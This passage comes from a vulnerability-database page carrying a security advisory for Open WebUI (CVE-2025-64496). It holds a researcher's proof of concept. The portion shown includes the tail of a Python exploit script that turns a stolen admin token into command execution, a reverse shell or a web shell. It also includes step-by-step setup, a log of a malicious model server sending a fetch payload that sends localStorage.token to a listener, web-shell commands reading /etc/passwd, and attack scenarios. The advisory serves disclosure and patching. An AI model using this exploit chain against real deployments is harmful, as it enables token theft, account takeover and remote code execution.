help=\u0027Reverse shell mode (HOST PORT)\u0027)\n parser.add_argument(\u0027--command\u0027, \u0027-c\u0027, help=\u0027Execute specific command\u0027)\n parser.add_argument(\u0027--interactive\u0027, \u0027-i\u0027, action=\u0027store_true\u0027,\n help=\u0027Create interactive web shell\u0027)\n parser.add_argument(\u0027--tool\u0027, \u0027-t\u0027, action=\u0027store_true\u0027,\n help=\u0027Use Tools API instead of Functions API (both vulnerable)\u0027)\n\n args = parser.parse_args()\n\n print_banner()\n\n # Start listener in background\n print(f\"{Colors.OKBLUE}[*] Starting token capture listener on port {EXFIL_PORT}...{Colors.ENDC}\")\n listener_thread = threading.Thread(target=start_listener, daemon=True)\n listener_thread.start()\n time.sleep(1)\n\n print(f\"{Colors.OKGREEN}[+] Listener ready{Colors.ENDC}\")\n print(f\"{Colors.WARNING}[*] Admin must start a chat with malicious model{Colors.ENDC}\")\n print(f\"\\n{Colors.OKCYAN}[~] Listening for token on http://0.0.0.0:{EXFIL_PORT}/leak{Colors.ENDC}\\n\")\n\n # Wait for token\n start_time = time.time()\n token_received.wait() # Block until token is captured\n\n elapsed = time.time() - start_time\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n\n print(f\"\\n{Colors.OKBLUE}[{timestamp}] Verifying token...{Colors.ENDC}\")\n\n if not verify_token(captured_token):\n print(f\"{Colors.FAIL}[!] Token verification failed{Colors.ENDC}\")\n sys.exit(1)\n\n print(f\"{Colors.OKGREEN}[+] Token valid!{Colors.ENDC}\")\n\n # Show which API will be used\n api_type = \"Tools API\" if args.tool else \"Functions API\"\n print(f\"{Colors.OKCYAN}[*] Exploitation method: {api_type}{Colors.ENDC}\")\n print(f\"{Colors.OKCYAN}[*] Vulnerable code: plugin.py:{101 if args.tool else 145} (exec){Colors.ENDC}\")\n\n # Calculate time to shell\n exploitation_start = time.time()\n\n # Execute based on mode\n if args.shell:\n # Reverse shell mode\n host, port = args.shell\n print(f\"{Colors.WARNING}\\n[*] Target: {host}:{port}{Colors.ENDC}\")\n print(f\"{Colors.WARNING}[!] Make sure listener is running: nc -lvnp {port}{Colors.ENDC}\\n\")\n\n # Choose function based on --tool flag\n if args.tool:\n success = create_tool_reverse_shell(captured_token, host, int(port))\n else:\n success = create_reverse_shell(captured_token, host, int(port))\n\n if success:\n total_time = time.time() - start_time\n print(f\"\\n{Colors.OKGREEN}{Colors.BOLD}[+] SHELL DELIVERED!{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Check your listener for connection{Colors.ENDC}\\n\")\n else:\n print(f\"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}\")\n\n elif args.interactive:\n # Interactive web shell\n if args.tool:\n success = create_tool_interactive_shell(captured_token)\n else:\n success = create_interactive_shell_function(captured_token)\n\n if success:\n total_time = time.time() - start_time\n print(f\"\\n{Colors.OKGREEN}{Colors.BOLD}[+] WEB SHELL ACTIVE!{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}\")\n if args.tool:\n print(f\"\\n{Colors.OKCYAN}Usage: Call tool with command parameter{Colors.ENDC}\")\n else:\n print(f\"\\n{Colors.OKCYAN}Usage in Open WebUI chat:{Colors.ENDC}\")\n print(f\" !shell whoami\")\n print(f\" !shell id\")\n print(f\" !shell cat /etc/passwd\\n\")\n else:\n print(f\"{Colors.FAIL}[!] Web shell creation failed{Colors.ENDC}\")\n\n else:\n # Default: Command execution PoC\n command = args.command if args.command else \u0027whoami \u0026\u0026 hostname \u0026\u0026 id\u0027\n\n # Choose function based on --tool flag\n if args.tool:\n success = create_tool_command_execution(captured_token, command)\n log_grep = \"AUTO_EXPLOIT_TOOL_OUTPUT\"\n else:\n success = create_command_execution(captured_token, command)\n log_grep = \"AUTO_EXPLOIT_OUTPUT\"\n\n if success:\n total_time = time.time() - start_time\n print(f\"\\n{Colors.OKGREEN}{Colors.BOLD}[+] CODE EXECUTION ACHIEVED!{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Command: {command}{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}\")\n print(f\"\\n{Colors.WARNING}[*] Check Open WebUI backend logs for output:{Colors.ENDC}\")\n print(f\" docker logs open-webui-backend -f | grep {log_grep}\\n\")\n else:\n print(f\"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}\")\n\n print(f\"{Colors.HEADER}{\u0027=\u0027*60}\")\n print(f\" Exploit Complete - From Malicious Model Server to RCE in seconds\")\n print(f\"{\u0027=\u0027*60}{Colors.ENDC}\\n\")\n\nif __name__ == \u0027__main__\u0027:\n try:\n main()\n except KeyboardInterrupt:\n print(f\"\\n\\n{Colors.WARNING}[!] Interrupted{Colors.ENDC}\\n\")\n sys.exit(0)\n\n\n```\nStart: \n`uv venv`\n`uv pip install requests`\n`uv run python autoauto_exploit.py`\n\n\nStep 3: Enable Direct Connections and Add Malicious Model\n\n1. Login to Open WebUI as admin\n2. Go to Admin Panel \u2192 Settings \u2192 Connections\n3. Enable \"Direct Connections\" toggle\n4. Click \"Add Connection\"\n5. Enter:\n - Name: Test Model\n - Base URL: http://host.docker.internal:8000 (for Docker) OR http://localhost:8000\n - API Key: any-value\n6. Enable the connection and Save\n\n\nStep 4: Trigger Exploitation\n\n1. In Open WebUI chat interface\n2. Select \"gpt-4-turbo-preview\" from model dropdown\n3. Type any message: \"Hello\"\n4. Press Send\n\n\u003cimg width=\"5986\" height=\"3074\" alt=\"CleanShot 2025-10-10 at 10 44 40@2x\" src=\"https://github.com/user-attachments/assets/ed141290-2e5c-45e4-8cc6-82d3c604cf86\" /\u003e\n\nEXPECTED RESULTS:\n\nTerminal 2 (node server.js):\n```\nnode server.js\n\n============================================================\n[*] Malicious OpenAI-Compatible Model Server\n[*] PoC for Open WebUI XSS to RCE Vulnerability\n============================================================\n[*] Listening on http://localhost:8000\n[*] Endpoints:\n - POST /v1/chat/completions (malicious)\n - GET /v1/models\n[*] Attack Mode: TOKEN_THEFT\n[*] Payload: Steal localStorage.token and exfiltrate\n[*] Exfiltration Target: http://localhost:8081\n============================================================\n\n[\u2713] Server ready to exploit Open WebUI\n[*] Press Ctrl+C to stop\n\n[2025-10-10T07:01:52.747Z] GET /models\n[2025-10-10T07:01:53.093Z] POST /chat/completions\n Body: {\"stream\":true,\"model\":\"gpt-4-turbo-preview\",\"messages\":[{\"role\":\"user\",\"content\":\"hi\"}]}...\n\n------------------------------------------------------------\n[!] EXPLOIT TRIGGERED\n[!] Victim sent message: \"hi\"\n[!] Injecting malicious SSE event...\n------------------------------------------------------------\n\n[!] Sending malicious execute event:\n{\n \"event\": {\n \"type\": \"execute\",\n \"data\": {\n \"code\": \"await fetch(\u0027http://localhost:8081/leak?token=\u0027 + encodeURIComponent(localStorage.token))\"\n }\n }\n}\n[\u2713] Malicious payload delivered successfully\n[*] Waiting for exfiltrated data at listener...\n\n[2025-10-10T07:01:53.733Z] POST /chat/completions\n Body: {\"model\":\"gpt-4-turbo-preview\",\"messages\":[{\"role\":\"user\",\"content\":\"### Task:\\nSuggest 3-5 relevant...\n\n------------------------------------------------------------\n[!] EXPLOIT TRIGGERED\n```\n\nTerminal 3 (uv run python auto_exploit.py):\n```\nuv run python auto_exploit.py\n\n============================================================\n Open WebUI - Automated Token to RCE Exploit\n Time to Shell: ~5 seconds from prompt to shell\n============================================================\n\n[*] Starting token capture listener on port 8081...\n[+] Listener ready\n[*] Admin must start a chat with malicious model\n\n[~] Listening for token on http://0.0.0.0:8081/leak\n\n\n============================================================\n[10:01:53] TOKEN CAPTURED!\n============================================================\n[*] Token length: 141 chars\n[*] Source: 127.0.0.1\n\n[10:01:53] Verifying token...\n[+] Token valid!\n[*] Exploitation method: Functions API\n[*] Vulnerable code: plugin.py:145 (exec)\n\n[10:01:53] Weaponizing token...\n\n[+] CODE EXECUTION ACHIEVED!\n[+] Method: Functions API\n[+] Command: whoami \u0026\u0026 hostname \u0026\u0026 id\n[+] Total time: 10.40 seconds\n\n[*] Check Open WebUI backend logs for output:\n docker logs open-webui -f | grep AUTO_EXPLOIT_OUTPUT\n\n============================================================\n Exploit Complete - From Malicious Model Server to RCE in seconds\n============================================================\n\n\n\u003cimg width=\"5996\" height=\"3088\" alt=\"CleanShot 2025-10-10 at 10 46 17@2x\" src=\"https://github.com/user-attachments/assets/2ef54b7d-314e-4376-ab15-840dc65ea778\" /\u003e\n\n```\n\nStep 5: Verify Token Theft\n\ncurl -H \"Authorization: Bearer $(cat stolen_token.txt)\" \\\n \u0027http://localhost:3000/api/v1/auths/\u0027\n\nExpected output:\n{\n \"id\": \"...\",\n \"email\": \"admin@example.com\",\n \"role\": \"admin\",\n \"token_type\": ...\n}\n\n\nEXPLOITATION TIMELINE:\n- T+0s: User sends message\n- T+1s: Malicious SSE event injected \n- T+2s: JavaScript executes in browser\n- T+3s: Token exfiltrated to attacker\n- T+4s: Token captured and validated\n\nTotal time: \u003c 5 seconds from first message\n\nDOCKER CONFIGURATION NOTE:\nFor Docker deployments, use host.docker.internal:8000 to reach the host machine \nwhere the malicious server runs.\n\nAUTOMATED EXPLOITATION:\nA complete automated exploit script is available that captures the token and \nimmediately weaponizes it for RCE. Contact for full exploit code.\n\n### Impact\nVULNERABILITY TYPE: Code Injection via Untrusted External Data Source\n\nWHO IS IMPACTED:\n\n - All users who enable Direct Connections feature\n - Organizations allowing external model endpoints\n - Users adding local models (Ollama, LM Studio, custom APIs)\n - Development and testing environments\n - Direct Connections is admin-controllable but affects all users once enabled\n - Common in organizations using \"bring your own model\" policies\n - Social engineering success rate is high (\"Try my free GPT-4\")\n - Feature is designed for external connections, making attacks plausible\n\nATTACK SCENARIOS:\n\nScenario 1: Corporate Espionage\n- Attacker targets company using Open WebUI\n- Posts \"free GPT-4 alternative\" on Reddit/HackerNews \n- Company employees add the malicious model\n- Multiple tokens stolen including admin\n- Full access to company\u0027s AI conversations and data\n\nScenario 2: Supply Chain Attack\n- MSP hosts Open WebUI for 50 clients\n- MSP employee tests malicious model\n- Admin token stolen\n- Attacker gains access to all 50 client instances\n\nScenario 3: Insider Threat Amplification\n- Disgruntled employee with user account\n- Deploys malicious model\n- Shares in company Slack: \"Cool new model!\"\n- Admin tests it, token stolen\n- Employee escalates to admin privileges\n\n**Please note that once this vulnerability is fixed, we are going to release a blog. I work as a security researcher for Cato Networks.**",
"id": "GHSA-cm35-v4vp-5xvx",
"modified": "2025-11-15T02:10:07Z",
"published": "2025-11-07T17:37:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64496"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI Affected by an External Model Server (Direct Connections) Code Injection via SSE Events"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…